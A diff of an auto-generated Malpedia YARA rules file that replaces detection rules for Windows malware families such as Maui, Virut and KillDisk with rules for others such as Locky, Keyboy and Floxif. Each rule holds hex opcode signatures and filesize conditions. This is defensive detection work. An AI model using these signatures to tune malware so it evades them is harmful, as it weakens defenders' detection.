+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.minibus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.minibus_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "c832f22e1bbb1398fc1d6a8199e3732cb12b403d9a2eb2103c84e67dba24e6f9"
+		logic_hash = "f2e35e1c340980cefeddf2362242a94c8425d63f412b36fb6c1988b6b9f9c6f1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87071,32 +87192,32 @@ rule MALPEDIA_Win_Maui_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc8 23c7 f7d1 23cd 8b6c2438 0bc8 8bd6 }
-		$sequence_1 = { e8???????? a1???????? 33c4 898424bc000000 8b8424c4000000 8b8c24d0000000 8b9424d4000000 }
-		$sequence_2 = { 309630934b00 46 3bf3 7202 33f6 8d50ff 3bd7 }
-		$sequence_3 = { 743b 8b4910 85c9 7434 8b9c24ec000000 8bf0 894c2428 }
-		$sequence_4 = { 0f84c5fdffff 8b4c2440 b801000000 85c9 0f84b8fdffff 8b542418 }
-		$sequence_5 = { 6814030000 68???????? 6a44 e9???????? 6822030000 68???????? 6a41 }
-		$sequence_6 = { 83c414 5f 5e c3 8b542414 8b460c 52 }
-		$sequence_7 = { 89442418 e8???????? 8b4c2418 83c408 c744241001000000 3bc8 7408 }
-		$sequence_8 = { 83c414 eb49 8b4714 56 68d0020000 83c008 68???????? }
-		$sequence_9 = { 755a 6852010000 68???????? 6a20 6a69 6a21 e8???????? }
+		$sequence_0 = { c20400 57 c645f800 ff75f8 51 8bce e8???????? }
+		$sequence_1 = { c745b001000000 e8???????? 837f1408 8bc8 894db4 }
+		$sequence_2 = { 837df408 897dec 8d0446 8945fc 7263 8b3b }
+		$sequence_3 = { 7606 ff15???????? 51 52 e8???????? }
+		$sequence_4 = { 83fa03 7c16 0fb74304 83f85c 0f84cd000000 83f82f 0f84c4000000 }
+		$sequence_5 = { 0f86bd000000 ebb1 85c9 7410 51 }
+		$sequence_6 = { b800000080 83c023 50 e8???????? 83c404 85c0 0f84c7000000 }
+		$sequence_7 = { 720f 8d4823 3bc8 7641 }
+		$sequence_8 = { 8d0c4d02000000 8bc2 81f900100000 7216 8b50fc 83c123 2bc2 }
+		$sequence_9 = { 0f87b1000000 c747140f000000 83fb10 7319 6a10 }
 
 	condition:
-		7 of them and filesize < 1616896
+		7 of them and filesize < 324608
 }
-rule MALPEDIA_Win_Kurton_Auto : FILE
+rule MALPEDIA_Win_Rumish_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae340b25-d60e-5936-9704-4ef115d92a62"
+		id = "39ff2947-af25-5616-8af4-3255d7aff8f4"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.kurton_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rumish"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rumish_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "98f093531c4285f2e18a4965e5bde7f8dfb22eacc63485687a98c0565a239fa8"
+		logic_hash = "a573540e20ab8e039d32cb674dc87b90cf57e8c3eeb462c1c864991bf4880267"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87110,32 +87231,32 @@ rule MALPEDIA_Win_Kurton_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33d2 f7750c ebe7 55 8bec 53 56 }
-		$sequence_1 = { 51 ffd6 8b3d???????? 8d542428 52 ffd7 }
-		$sequence_2 = { 8bc6 83e61f c1f805 59 8b0485a05b0210 8d0cf6 8064880400 }
-		$sequence_3 = { 6a03 8d542418 68???????? 52 50 e8???????? 8b8c2438010000 }
-		$sequence_4 = { 53 52 53 53 6a16 50 }
-		$sequence_5 = { 52 53 68???????? 50 c745bcf4010000 ff15???????? }
-		$sequence_6 = { 6a00 6a00 51 e8???????? 83c410 c20400 }
-		$sequence_7 = { 8079ff00 0f8547ffffff 8bc6 8088e15d021008 40 3dff000000 72f1 }
-		$sequence_8 = { ff15???????? 85f6 7434 8d4e08 51 ff15???????? 85c0 }
-		$sequence_9 = { f7d1 2bf9 8d94245d010000 8bc1 8bf7 8bfa c1e902 }
+		$sequence_0 = { 898554ffffff 83bd54ffffff00 0f85de000000 c7854cffffff00000000 eb0f 8b854cffffff 83c001 }
+		$sequence_1 = { dc35???????? dc0d???????? dc05???????? d97df6 0fb745f6 0d000c0000 }
+		$sequence_2 = { 8d4dd4 e8???????? 8b4db0 8908 8b55a0 3b55ec 7d27 }
+		$sequence_3 = { 7738 8b951cffffff ff24957cf54300 68???????? 8d4d94 e8???????? eb1c }
+		$sequence_4 = { 8d8d68ffffff e8???????? 8d8d60ffffff 51 8d8d68ffffff e8???????? 8b9558ffffff }
+		$sequence_5 = { 55 8bec 53 e8???????? b9???????? e8???????? }
+		$sequence_6 = { eb10 68???????? 8d8d4cffffff e8???????? e9???????? 0fbf458c 8985d0feffff }
+		$sequence_7 = { 83e10f c1e102 0fb655f5 81e2c0000000 c1fa06 0bca }
+		$sequence_8 = { 8b85c0fcffff 83c001 8985c0fcffff 8b8dc0fcffff 3b8df4fcffff 0f8de4000000 8b95c4fcffff }
+		$sequence_9 = { d918 8b8dc4feffff d901 dc1d???????? dfe0 f6c444 7b11 }
 
 	condition:
-		7 of them and filesize < 344064
+		7 of them and filesize < 770048
 }
-rule MALPEDIA_Win_Virut_Auto : FILE
+rule MALPEDIA_Win_Recordbreaker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c8349287-bd2e-52b4-9752-e7bc4edd95a7"
+		id = "9dc0ca6e-db62-51b1-9019-1c46d30aeec8"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.virut_auto.yar#L1-L172"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.recordbreaker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.recordbreaker_auto.yar#L1-L121"
 		license_url = "N/A"
-		logic_hash = "a48ac1b971086542095b7fb3caa9f795a6530b3c7c59d9de9bb3d487eade9d56"
+		logic_hash = "a0221e50197a38d94db3feaa17095d8a8348850bd5ac357aa5c929b1c8bf609a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87149,38 +87270,32 @@ rule MALPEDIA_Win_Virut_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8424d0000000 50 ffd6 83f8ff 0f8573030000 6800100000 }
-		$sequence_1 = { 2bce 6a00 51 56 53 }
-		$sequence_2 = { 81e300f0ff0f 51 53 6a00 }
-		$sequence_3 = { b108 e8???????? 6894000000 5e 2be6 893424 }
-		$sequence_4 = { 290c24 8b7224 59 03f3 8b521c }
-		$sequence_5 = { 745b 50 54 6804010000 57 }
-		$sequence_6 = { cd2e 83f800 7c19 60 e8???????? 8b542430 5d }
-		$sequence_7 = { 42 3ac3 75f6 8d8424d0010000 50 }
-		$sequence_8 = { 8b35???????? 53 8d442444 50 }
-		$sequence_9 = { 3acb 7423 8bf8 8ac1 2c30 3c09 7719 }
-		$sequence_10 = { ab 6a10 8d45ec 50 53 }
-		$sequence_11 = { 53 6a05 8bcc 50 8bd4 50 }
-		$sequence_12 = { 0f31 03c2 a3???????? ff15???????? a3???????? 8d8424e0030000 }
-		$sequence_13 = { 2e44 4c 4c 00ff 95 }
-		$sequence_14 = { 56 8d442444 53 50 e8???????? 33c0 8d7c243c }
-		$sequence_15 = { 803f4d 0f85f9000000 807f015a 0f85ef000000 885c2420 885c2421 885c2422 }
+		$sequence_0 = { 8bc8 e8???????? 8bd3 8bc8 e8???????? 8b15???????? 8bc8 }
+		$sequence_1 = { 85d2 7425 8b450c b9feffff7f 2bc6 57 }
+		$sequence_2 = { 6a00 8d4514 50 6aff ff35???????? }
+		$sequence_3 = { 8365f800 a1???????? c745f464000000 53 56 }
+		$sequence_4 = { ff35???????? 57 ff15???????? 8b7508 83c410 8bd7 }
+		$sequence_5 = { 33c0 50 6800000008 6a02 50 50 }
+		$sequence_6 = { 83c414 85c0 790f 53 ff15???????? }
+		$sequence_7 = { 57 8906 ff15???????? 53 ff15???????? 33c0 }
+		$sequence_8 = { c1e704 037d14 40 8901 }
+		$sequence_9 = { ff7510 ff750c 56 e8???????? 83c414 56 ff15???????? }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 232312
 }
-rule MALPEDIA_Win_Rhttpctrl_Auto : FILE
+rule MALPEDIA_Win_Locky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "bb8327a4-6882-545f-b20a-98b7f136eb51"
+		id = "9434ac8a-f19d-5097-9718-4e0bcd7c3bb7"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rhttpctrl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rhttpctrl_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.locky_auto.yar#L1-L181"
 		license_url = "N/A"
-		logic_hash = "a8b0cf895e0bd3f2af68f83e9a4ca3cd7018abded67cb45f683d7384d581104e"
+		logic_hash = "cfd0780ce81a27b30c6ff7ba29e871c926663b6bd8e9b266836319c43aec3bb1"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87194,32 +87309,39 @@ rule MALPEDIA_Win_Rhttpctrl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { d1fe 6a55 ff34f5c0d54100 ff7508 e8???????? 83c40c 85c0 }
-		$sequence_1 = { c645f401 ff15???????? 6a00 6a00 }
-		$sequence_2 = { c78424d901000000000000 8d8424e0010000 660fd68424d1010000 0f118424c1010000 6800040000 50 66c78424e50100000000 }
-		$sequence_3 = { 6a2b 68???????? 57 e8???????? 83c40c 8d85f8feffff 8d772b }
-		$sequence_4 = { ff248545924000 8bce e8???????? eb45 834e28ff 895e24 }
-		$sequence_5 = { 68???????? e8???????? 83c408 895f08 837f1400 c7471001000000 }
-		$sequence_6 = { b824280000 e8???????? a1???????? 33c5 8945f0 53 56 }
-		$sequence_7 = { ffb5d8d7ffff ffd6 ffb5d4d7ffff ffd6 8d8ddcd7ffff }
-		$sequence_8 = { 33d2 8b08 85c9 7407 }
-		$sequence_9 = { ffb5e4d7ffff ffb5e0d7ffff 50 ff15???????? 8bc8 898dd8d7ffff 85c9 }
+		$sequence_0 = { 51 51 8b00 6a00 8d4d0c 51 ff750c }
+		$sequence_1 = { 760a 68???????? e8???????? a1???????? 2b05???????? 6a1c }
+		$sequence_2 = { 50 c745f8???????? e8???????? 8d85f0fdffff 50 }
+		$sequence_3 = { 99 83e207 8d3c02 33d2 42 c1ff03 663bca }
+		$sequence_4 = { 99 5e f7fe 8bf0 81fe48922409 760a 68???????? }
+		$sequence_5 = { 6a00 ff15???????? 85c0 751e ff15???????? c745f8???????? }
+		$sequence_6 = { 8907 8bc7 c9 c20400 ff15???????? 8945fc }
+		$sequence_7 = { 7314 8b4e1c 8b431c 3bc8 7c0a }
+		$sequence_8 = { 5b c21000 e9???????? 8bff 55 8bec 56 }
+		$sequence_9 = { 03d8 8b442408 f7e1 03d3 5b c21000 e9???????? }
+		$sequence_10 = { 66ab e9???????? 8d12 e9???????? }
+		$sequence_11 = { ebcf 90 8d36 90 }
+		$sequence_12 = { 5e c21000 8bff 55 8bec 33c0 8b4d08 }
+		$sequence_13 = { 6a61 e9???????? 90 58 }
+		$sequence_14 = { 6a63 e9???????? 90 8d36 }
+		$sequence_15 = { 66ab e9???????? 58 90 e9???????? 90 }
+		$sequence_16 = { 66ab 90 e9???????? 8d00 }
 
 	condition:
-		7 of them and filesize < 339968
+		7 of them and filesize < 1122304
 }
-rule MALPEDIA_Win_Smac_Auto : FILE
+rule MALPEDIA_Win_Expiro_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6cf7aa8f-47b5-541a-9ef7-59898eb272ee"
+		id = "537fff19-bacc-5fad-8e62-d15e873151bb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smac"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.smac_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.expiro"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.expiro_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "2551ca62dde47575d33bf5dda5cc9135e813c4132339b49d1f3c1a2ad36da540"
+		logic_hash = "9d4a4b6071f8efe24f30549b3b2d217f52995878f6039fe924a8169a6f93625b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87233,34 +87355,34 @@ rule MALPEDIA_Win_Smac_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c002 0fb708 6685c9 75df 0fafd6 8bc2 3bc3 }
-		$sequence_1 = { e8???????? 57 e8???????? 59 57 8bf8 8bc6 }
-		$sequence_2 = { 57 57 6a10 57 57 57 8d8580f1ffff }
-		$sequence_3 = { 83c002 50 57 53 e8???????? 83c410 57 }
-		$sequence_4 = { a840 7411 a900040000 740a 6a09 58 }
-		$sequence_5 = { 50 6a00 53 e8???????? 83c410 57 }
-		$sequence_6 = { 48 0f84a6010000 48 741f 6a01 }
-		$sequence_7 = { 33c0 668975b4 66894db8 668955ba 668945bc }
-		$sequence_8 = { 7320 6a01 33ff 8db514f1ffff e8???????? 6a01 8d750c }
-		$sequence_9 = { 8be5 5d c3 55 8bec 83e4f8 81eccc060000 }
+		$sequence_0 = { 8b550c 8b349a b9???????? 8bc6 8da42400000000 668b10 663b11 }
+		$sequence_1 = { 83c404 803d????????00 0f8543010000 68???????? e8???????? 83c404 8d8424e4020000 }
+		$sequence_2 = { 8d442414 50 56 33c0 897c241c }
+		$sequence_3 = { c78424d400000007000000 899c24d0000000 e8???????? 6a08 b8???????? 8d8c24c0000000 }
+		$sequence_4 = { 837e1408 722a 8b06 eb28 85ed 75f2 896e10 }
+		$sequence_5 = { 52 e8???????? 85c0 752b 68???????? eb29 68???????? }
+		$sequence_6 = { 7407 50 ff15???????? 8ac3 e9???????? 57 ff15???????? }
+		$sequence_7 = { 75f5 2bc2 d1f8 50 8d442458 8d742420 e8???????? }
+		$sequence_8 = { c744242c07000000 897c2428 6689542418 8d7102 668b11 83c102 663bd7 }
+		$sequence_9 = { 83c404 33c0 668944244c 6a04 897c2464 895c2460 e8???????? }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 3776512
 }
-rule MALPEDIA_Win_Dratzarus_Auto : FILE
+rule MALPEDIA_Win_Keyboy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9c3af3dd-4032-5af8-b2c4-ec6909e4538c"
+		id = "e3c6834d-0c67-5748-994c-227d3722e6aa"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dratzarus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dratzarus_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.keyboy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.keyboy_auto.yar#L1-L236"
 		license_url = "N/A"
-		logic_hash = "2840756e9ce2aef8d569e9bd5574fc7ae7c62b15ae58ef485173a9e6c40f95ff"
+		logic_hash = "b020d013796e2ff9bcbc5f453861ded4cb6f63e612a44995496ca47a3bf65fc0"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87272,32 +87394,47 @@ rule MALPEDIA_Win_Dratzarus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 66c744243876d4 c785e0000000eb6cf5c3 c785e4000000994fa64a c785e8000000961a40af 66c785ec00000072ff c685ee000000e4 }
-		$sequence_1 = { 48895c2408 55 488d6c24a9 4881ec90000000 488d4de7 ba0d000000 c745e72af5766c }
-		$sequence_2 = { c745cc178fe463 66c745d07449 e8???????? 488bc8 ff15???????? }
-		$sequence_3 = { c644243660 c74424284071b330 66c744242c2f3e c644242e60 c74424407a767776 c74424447e767529 c74424205277bc30 }
-		$sequence_4 = { 488d8d88020000 ba13000000 488905???????? e8???????? }
-		$sequence_5 = { 89742450 6689b510020000 48898512020000 4889851a020000 66898522020000 6689b500030000 e8???????? }
-		$sequence_6 = { 4533db 458d4310 488d942430010000 488d4c2420 }
-		$sequence_7 = { 666666666666660f1f840000000000 0fb7040a 4883c102 6689440ffc 6685c0 75ee 488d8c2480020000 }
-		$sequence_8 = { c745e85b02d12d c745ecde00c41e c745f0b2db7461 c645f478 e8???????? 488bc8 ff15???????? }
-		$sequence_9 = { 488b05???????? 4889470e 8b05???????? 894716 33c0 }
+		$sequence_0 = { 51 ff75d8 6a00 ff75c0 }
+		$sequence_1 = { 6a00 8945f2 8d45f8 50 6a0e }
+		$sequence_2 = { c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 c705????????eec45abf c705????????bbee2bd1 c705????????3e20f129 }
+		$sequence_3 = { c705????????a856701f c705????????597e743c c705????????0a9769e0 c705????????c4b85363 c705????????3abf261f }
+		$sequence_4 = { 5d c3 3b0d???????? f27502 f2c3 f2e953030000 55 }
+		$sequence_5 = { c705????????c4b85363 c705????????3abf261f c705????????890e9944 c705????????dbd99823 c705????????d468bcb5 c705????????2086e659 }
+		$sequence_6 = { ffd0 e9???????? bbfeffffff eb05 }
+		$sequence_7 = { e8???????? 85c0 755e 83ff20 }
+		$sequence_8 = { 8bf2 c745f470646174 66c745f86500 8a02 }
+		$sequence_9 = { 56 57 68cc020000 8d852cfdffff 8bf2 }
+		$sequence_10 = { 740a 6683f806 7404 32c9 eb02 }
+		$sequence_11 = { f7d9 85db 0f44c2 23c8 }
+		$sequence_12 = { c745dc5368656c 8d45dc c745e06c333200 50 }
+		$sequence_13 = { 7207 b901000000 eb0f 3cfe 7509 }
+		$sequence_14 = { 8d85fcf7ffff 8bd9 6a00 50 e8???????? 83c40c 8d85fcf7ffff }
+		$sequence_15 = { 24a0 3ca0 7518 b800080000 }
+		$sequence_16 = { 2408 f6d8 1ac0 24dd }
+		$sequence_17 = { 84c0 75f0 8d55ec c745ec5c417070 c745f06c655c55 8bf2 }
+		$sequence_18 = { c745f447646933 8d45f4 66c745f83200 50 ff15???????? 8945bc }
+		$sequence_19 = { ff15???????? 8b15???????? 8b4dc0 8945b8 e8???????? }
+		$sequence_20 = { e8???????? 6a7c 8d4580 c7857cffffff736c6d00 }
+		$sequence_21 = { 85c0 741d ff15???????? 6afe 8d45f0 50 }
+		$sequence_22 = { 1ac0 24dd 88474e e8???????? }
+		$sequence_23 = { 0fbec0 0fafc8 80f185 880c3e 46 3bf2 }
+		$sequence_24 = { 41 8a043e 0fbe4c8de0 3401 0fbec0 0fafc8 80f185 }
 
 	condition:
-		7 of them and filesize < 1606656
+		7 of them and filesize < 2170880
 }
-rule MALPEDIA_Win_Daxin_Auto : FILE
+rule MALPEDIA_Win_Unidentified_042_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "eb9db3c6-59a2-55fc-ab29-402a0b79069e"
+		id = "b7505cdf-3b67-54d1-b86a-09699ebba78c"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.daxin"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.daxin_auto.yar#L1-L145"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_042"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.unidentified_042_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "9f52c4014d6014a5dd41f71fe4bb65b03575c870c6d23007d187323e250b54a3"
+		logic_hash = "e1a66a5b2b9486f9685ec5c1def3b62ee2d1680cb3c8b0c5674fcab890803964"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87311,37 +87448,32 @@ rule MALPEDIA_Win_Daxin_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 2bc2 d1f8 99 f7f9 }
-		$sequence_1 = { 413bd5 7209 438d443500 3bd0 7226 }
-		$sequence_2 = { e9???????? 448b4f04 4533c0 ba02000000 488bcb }
-		$sequence_3 = { 448b4004 0fb7c1 c1e910 66c1c008 0fb7d0 }
-		$sequence_4 = { 740d 488bcb e8???????? e9???????? 33c9 }
-		$sequence_5 = { 7508 488bc8 ff5028 eb02 33c0 }
-		$sequence_6 = { 57 4154 4883ec20 4533c0 }
-		$sequence_7 = { ff15???????? 884708 4c8b8380000000 4d85c0 }
-		$sequence_8 = { 885303 7e1b 8b74241c 8bcf }
-		$sequence_9 = { 8854243b 8b54243b 81e2ff000000 03c2 }
-		$sequence_10 = { 88540e07 885c3e08 7cd2 897e04 }
-		$sequence_11 = { 88543908 8a443108 02c2 25ff000000 }
-		$sequence_12 = { 8854243a 8b54243a 81e2ff000000 03c2 }
-		$sequence_13 = { 885017 8bd1 c1e902 f3a5 8bca }
-		$sequence_14 = { 88502a 8bda 8b4ca814 2bca }
+		$sequence_0 = { 6a20 ba???????? 8bde e8???????? 83c404 85c0 7410 }
+		$sequence_1 = { 52 8b9578ffffff 50 53 8d8d7cffffff e8???????? 83c414 }
+		$sequence_2 = { 33f7 8b7df0 337dec 23f8 337df0 03f7 8bbdd8feffff }
+		$sequence_3 = { e8???????? 83c408 85c0 7809 7e07 03f0 83fe04 }
+		$sequence_4 = { 0bfa 48 75f1 eb03 0fb6f8 }
+		$sequence_5 = { 25efff0000 66c1e104 660bc8 66898b50020000 8a4648 2401 0fb6c0 }
+		$sequence_6 = { c7855cfaffff25da3f2e c78560fafffffafe28be c78564faffffaff05b42 c78568faffff0973699c c7856cfaffffb195ef80 c78570faffffdccc6129 c78574faffff2b44064a }
+		$sequence_7 = { 1bc0 2556ffffff 33cd 83c011 e8???????? 8be5 }
+		$sequence_8 = { 8b7df4 8b45e8 83f903 0f8dad000000 85c9 0f88a5000000 8bd1 }
+		$sequence_9 = { 6824a4e360 681c781e53 6890000000 6a01 6a02 e8???????? 8b4df8 }
 
 	condition:
-		7 of them and filesize < 3475456
+		7 of them and filesize < 516096
 }
-rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE
+rule MALPEDIA_Win_Dispenserxfs_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "f988a94d-ce66-5749-aa7b-8d72d93ac6d8"
+		id = "49bf9fde-27a7-5a52-b363-6d4c360f5198"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_ausov"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.webc2_ausov_auto.yar#L1-L112"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dispenserxfs"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dispenserxfs_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "1e4b39bc03f6a1c14963eaf8f0b58843065ae625a870f162ccaf462590958318"
+		logic_hash = "0ae97d732c7fee9f1fd4b6377f2a916fed962748494ab51169af7ce6e36e4229"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87355,32 +87487,32 @@ rule MALPEDIA_Win_Webc2_Ausov_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c408 50 ff15???????? 8945f8 0f8407000000 }
-		$sequence_1 = { 8dbdfcfbffff 83c9ff 33c0 f2ae }
-		$sequence_2 = { 83c408 50 8b85f8fbffff 50 e8???????? }
-		$sequence_3 = { e8???????? 83c40c 85c0 754e 0f8407000000 }
-		$sequence_4 = { 50 68???????? ff15???????? 8985c4fdffff }
-		$sequence_5 = { e9???????? 8d8db0fbffff 51 8d9500feffff 52 }
-		$sequence_6 = { 83ad34faffff01 83bd34faffff00 7429 83ad34faffff01 83bd34faffff00 7448 e9???????? }
-		$sequence_7 = { 7429 83ad34faffff01 83bd34faffff00 7448 }
-		$sequence_8 = { 8b954cfaffff 3a4a01 7523 838548faffff02 83854cfaffff02 }
-		$sequence_9 = { b90d000000 33c0 8dbdc9fdffff f3ab }
+		$sequence_0 = { 8975c0 8975c4 8b35???????? 57 c745b430000000 c745b803000000 }
+		$sequence_1 = { 68???????? e8???????? c7042410270000 ff15???????? 6a00 }
+		$sequence_2 = { 6a02 ff15???????? 8bf0 83feff 74ef 8d85d4fdffff c785d4fdffff2c020000 }
+		$sequence_3 = { 7c08 8d50ec e8???????? 57 ff15???????? }
+		$sequence_4 = { 7451 33c9 33c0 8bd9 663b422e 731f 8b4230 }
+		$sequence_5 = { 50 ffd6 53 6a03 58 50 8d8555ffffff }
+		$sequence_6 = { 898de0feffff 89b5e4feffff 89b5e8feffff 89b5ecfeffff 89b5f0feffff 66899df6feffff }
+		$sequence_7 = { 8945f0 0f823cffffff 8b4df4 8b45e4 }
+		$sequence_8 = { 8bcf e8???????? 8d8548feffff 8bd3 50 8bcf }
+		$sequence_9 = { 8d55c4 83c414 8bf2 8a02 42 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 114688
 }
-rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE
+rule MALPEDIA_Win_Floxif_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0195fc4c-73fa-5c09-bf2a-89a4d303bb67"
+		id = "41f034c6-3e3f-5292-917b-f675df5b6d2a"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus_killdisk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lazarus_killdisk_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.floxif_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "b26134f5ee9a86ea9f8f0c2251fd193e47e701ab49921be548b684d8807f003c"
+		logic_hash = "f5031af55712b6d9a11fdedff6451f65aebc55a1ba940596ca5431dc225391dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87393,33 +87525,33 @@ rule MALPEDIA_Win_Lazarus_Killdisk_Auto : FILE
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
-	strings:
-		$sequence_0 = { 8d95f8feffff 52 e8???????? 8b4dfc ff0d???????? 33cd 83c410 }
-		$sequence_1 = { 6800040000 68???????? 56 ffd7 4b 75ea }
-		$sequence_2 = { 56 57 e8???????? 8b1d???????? 33ff 6803010000 }
-		$sequence_3 = { 83d2ff 56 8945ec 8955f0 ff15???????? }
-		$sequence_4 = { ffd7 46 fe442410 d1eb 759b }
-		$sequence_5 = { e8???????? 8d842468010000 83c410 8d5001 }
-		$sequence_6 = { 8d75a6 8b06 8b4e08 8b560c 8945e8 8b4604 8945ec }
-		$sequence_7 = { 57 ff15???????? 46 83fe20 7cc0 }
-		$sequence_8 = { 57 8945f0 89b5e4fdffff ffd3 3b45f0 }
-		$sequence_9 = { 8945fc 53 56 57 6824010000 8d85c4feffff 6a00 }
-
+	strings:
+		$sequence_0 = { 83c404 50 8d4d84 e8???????? 83f8ff 0f85ac000000 6a00 }
+		$sequence_1 = { 80a0405d021000 40 41 41 }
+		$sequence_2 = { 8b55e0 8d440afc 50 8d4dc0 51 e8???????? }
+		$sequence_3 = { 85c0 0f8677010000 c745a800000000 eb09 8b45a8 83c001 }
